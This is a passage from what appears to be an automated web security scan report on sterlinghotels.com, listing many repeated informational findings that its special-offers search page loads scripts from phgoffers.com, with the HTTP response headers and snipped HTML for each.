<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232062092698750"></script>
...[SNIP]...

5.39. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069554730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:29:14 GMT
Content-Length: 63450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069554730000"></script>
...[SNIP]...

5.40. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063784886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:19:38 GMT
Content-Length: 63439

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063784886250"></script>
...[SNIP]...

5.41. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064542230000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:20:53 GMT
Content-Length: 63355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064542230000"></script>
...[SNIP]...

5.42. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064871605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:21:27 GMT
Content-Length: 63678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064871605000"></script>
...[SNIP]...

5.43. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065448948750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:22:24 GMT
Content-Length: 63381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065448948750"></script>
...[SNIP]...

5.44. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232794711292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 367105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ezh5oh45yanfn5yforgsb055; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:37:50 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232794711292500"></script>
...[SNIP]...

5.45. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066970042500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:24:56 GMT
Content-Length: 63414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066970042500"></script>
...[SNIP]...

5.46. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232060811292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:14:41 GMT
Content-Length: 207191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232060811292500"></script>
...[SNIP]...

5.47. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232062300980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:17:09 GMT
Content-Length: 63452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232062300980000"></script>
...[SNIP]...

5.48. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099529730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:19:12 GMT
Content-Length: 63483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099529730000"></script>
...[SNIP]...

5.49. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064676136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:21:06 GMT
Content-Length: 63362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064676136250"></script>
...[SNIP]...

5.50. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067183011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:17 GMT
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067183011250"></script>
...[SNIP]...

5.51. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063175980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:18:36 GMT
Content-Length: 63369

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063175980000"></script>
...[SNIP]...

5.52. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064686292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:21:08 GMT
Content-Length: 63369

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064686292500"></script>
...[SNIP]...

5.53. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065343792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:22:13 GMT
Content-Length: 63640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065343792500"></script>
...[SNIP]...

5.54. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069108167500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:28:30 GMT
Content-Length: 63362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069108167500"></script>
...[SNIP]...

5.55. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067825823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:22 GMT
Content-Length: 63519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067825823750"></script>
...[SNIP]...

5.56. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099990980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:19:58 GMT
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099990980000"></script>
...[SNIP]...

5.57. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063088480000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:18:28 GMT
Content-Length: 63362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063088480000"></script>
...[SNIP]...

5.58. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067177855000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:17 GMT
Content-Length: 63414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067177855000"></script>
...[SNIP]...

5.59. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068841917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:28:03 GMT
Content-Length: 63396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068841917500"></script>
...[SNIP]...

5.60. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069281448750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:28:48 GMT
Content-Length: 63447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069281448750"></script>
...[SNIP]...

5.61. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067284886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:27 GMT
Content-Length: 63449

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067284886250"></script>
...[SNIP]...

5.62. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063577073750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:19:17 GMT
Content-Length: 63598

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
